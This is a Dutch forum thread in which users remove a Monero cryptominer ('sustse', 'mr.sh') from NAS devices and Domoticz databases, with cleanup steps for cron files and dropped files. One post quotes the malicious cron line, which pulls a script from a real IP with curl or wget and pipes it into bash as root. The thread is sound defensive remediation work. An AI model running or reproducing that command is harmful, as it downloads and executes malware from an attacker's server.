Process 'sustse' gebruikt volledige processor

[eaz]

hier nog een detail-analyse:

http://udurrani.com/0fff/monero_mining.pdf

[mbomhof]

Samen met mijn zwager nog wat tijd aan gespendeerd...

Vooralsnog lijkt het er op dat ik hem volledig kwijt ben.
Geen piekbelasting meer op de processor, geen actieve processen inzake 'mr.sh' en/of 'sustse'.

Er blijken ook mr.sh regels in de database van Domoticz te staan.
Die heb ik ook verwijderd middels een database editor.

Op deze manier heb ik alles kunnen opschonen:


Domoticz:
Open domoticz en maak een backup van de database via 'Instellingen --> Instellingen --> Backup/Herstel --> Backup database'.
Middels een database edit tool de database openen, ik heb hiervoor 'DB Browser for SQLite' gebruikt.
https://sqlitebrowser.org/dl/

Open de database file die je hebt opgeslagen.
Op het tabblad 'Browse Data' kun je de tabel 'CustomImages' openen.
Hier zal je een regel in zien staan die ook mr.sh bevat.
Verwijder de regel middels 'Rechtsklik --> Delete Record'.
Sla de wijzigingen op middels de 'Write Changes' knop.
Lees de aanpassing in Domoticz in via 'Instellingen --> Instellingen --> Backup/Herstel --> Database herstellen'.
Herstart Domoticz.

Indien je Domoticz nog niet hebt bijgewerkt naar de laatste versie is dit direct de mogelijkheid dat te doen en het 'lek' te dichten.
http://www.jadahl.com/


NAS:
Log in op de NAS middels ssh.

Middels de 'vi' editor kunnen de verschillende regels uit de cron bestanden verwijderd worden.
('sudo' voor het openen van de editor met root rechten).
Voer de onderstaande regels uit.
Na het uitvoeren van 1 regel, opent een editor waar de je regel inzake mr.sh zou moeten zien.
(Zoiets: */1 * * * * root (curl -s http://107.174.47.156/mr.sh||wget -q -O - http://107.174.47.156/mr.sh)|bash -sh)
Middels de delete knop de regel verwijderen.
Bestand opslaan door ':w' en 'enter'.
vi editor sluiten door ':q' en 'enter'.
Herhaal voor alle 4 bestanden.

sudo vi /etc/cron.d/apache
sudo vi /etc/cron.d/root
sudo vi /var/spool/cron/root
sudo vi /var/spool/cron/crontabs/root

Vervolgens de verschillende aangemaakte bestanden verwijderen met de volgende commando's:

sudo rm /etc/cron.hourly/oanacroner1
sudo rm /var/tmp/sustse
sudo rm /var/tmp/wc.conf

Voor de zekerheid de NAS herstarten!

Let op, als één van de bestanden weer uitgevoerd wordt als je nog niet alles hebt aangepast, kun je opnieuw beginnen.
Misschien de internet verbinding tijdelijk verbreken of net als ik in de firewall het ip adres blokkeren, zodat het script niet succesvol uitgevoerd kan worden.


Voorlopig blijf ik de NAS monitoren om te kijken of er nog wat gebeurt.
Ook heb ik het IP adres nog steeds geblokkeerd in mijn firewall.
Als de NAS stabiel blijft zonder tekenen van sustse en/of mr.sh, ga ik ook de regel uit de firewall halen om te kijken of het terug komt.

[Henk Havelaar]

@mbomhof, bedankt voor dit uitzoek werk maar als Linux leek heb ik wat vragen.
Ik heb SSH en admin geactiveerd is de NAS en op mijn remote PC Putty gedownload en geïnstalleerd, port geforward in de router etc. Met Putty kan ik inloggen via SSH in de NAS, tot zover geen probleem. (NAS staat in Nederland, ik ben in Portugal).
Als ik de eerste regel sudo vi /etc/cron.d/apache invoer dan wordt er weer naar een paswoord gevraagd, dat geef ik in en de enige regel die verschijnt is gelijk de goede met daaronder een aantal blanco regels die beginnen met blauwe~, de tekstregel kan ik weghalen met de delete toets maar dan komt het. Wat ik ook probeer, alles wat ik invoer zoals w of -q werkt neit, heb jij enig idee wat ik verkeerd doe?

[Birdy]

Eerst de <esc> toets indrukken dan :wq en <enter>

[Briolet]

…Ik heb SSH en admin geactiveerd … port geforward in de router etc.…

Ik weet niet welke poorten, maar dat is:

1e niet nodig
2e zeer gevaarlijk als dat poort 22 is.

[Birdy]

Hij werkt op afstand, tenzij VPN gebruikt wordt, dan is het idd niet nodig.

[mbomhof]

Ik weet niet welke poorten, maar dat is:

1e niet nodig
2e zeer gevaarlijk als dat poort 22 is.

Inderdaad snel weer dicht zetten als je het niet meer nodig hebt!
Of liever nog alleen via een VPN of iets dergelijks gebruiken en helemaal niet naar het internet open!

Als ik de eerste regel sudo vi /etc/cron.d/apache invoer dan wordt er weer naar een paswoord gevraagd,

Dit komt omdat je met het 'sudo' commando de editor opent als 'root', hiervoor dus nogmaals een wachtwoord invoeren.

Wat ik ook probeer, alles wat ik invoer zoals w of -q werkt neit,

Zoals Birdy terecht aan geeft, mogelijk zit je in de editor modus.
Deze verlaten met <esc>.
Vervolgens :wq intypen (verschijnt onderin het scherm als het goed is) en sluiten met <enter>.

Eerst de <esc> toets indrukken dan :wq en <enter>

[Henk Havelaar]

Ik weet niet welke poorten, maar dat is:

1e niet nodig
2e zeer gevaarlijk als dat poort 22 is.
[/quote]

Dat zal wel moeten, ik ben nu in Portugal en de NAS draait in Nederland. Gelukkig heb ik in NL ook een PC'tje draaien waarmee ik via VNC de router kan aanpassen.

Birdy, ook bedankt.

[Henk Havelaar]

Ik weet niet wat ik verkeerd doe maar er gebeurd niets behalve het foutmeldings toontje van WIndows. In de bijlage het scherm nadat ik alles van de regel heb verwijderd

[Birdy]

<esc>
:wq

[Henk Havelaar]

Bedankt allemaal, het aanpassen lukt nu maar ik kan het niet snel genoeg doen, als ik de laatste wijzig is de eerste al weer aangepast.
Ik zal het thuis moeten doen zodat ik de internet verbinding met de NAS kan weghalen.

[mc_]

De genoemde bestanden zijn bij mij allemaal leeg, dus ik heb de volledige bestanden verwijderd. Mochten ze ooit weer nodig zijn, dan lijkt het me dat ze wel weer aangemaakt worden. En anders is dat handmatig snel gedaan.

[Henk Havelaar]

@mc, bedankt! Dat is een goede tip, ik heb nu alle bestanden verwijderd en dat was snel genoeg. Gisteravond de bestanden verwijderd, NAS opnieuw gestart en zo te zien is er niets terug gekomen, CPU belasting is nu steeds iddle rond de 8% en het proces sutste is niet meer aanwezig in de taakplanner.
Hopelijk komt het ook niet meer terug.

@mbomhof, bij jou alles ook nog rustig??

[mbomhof]

@Henk Havelaar, hier is alles inderdaad nog rustig.
Geen gekke dingen meer tegen gekomen.
Ook het IP adres in de firewall weer vrij gegeven.

[Henk Havelaar]

Virusscan werkt nu ook weer, zie het resultaat. Hopelijk is de rommel nu echt verwijderd.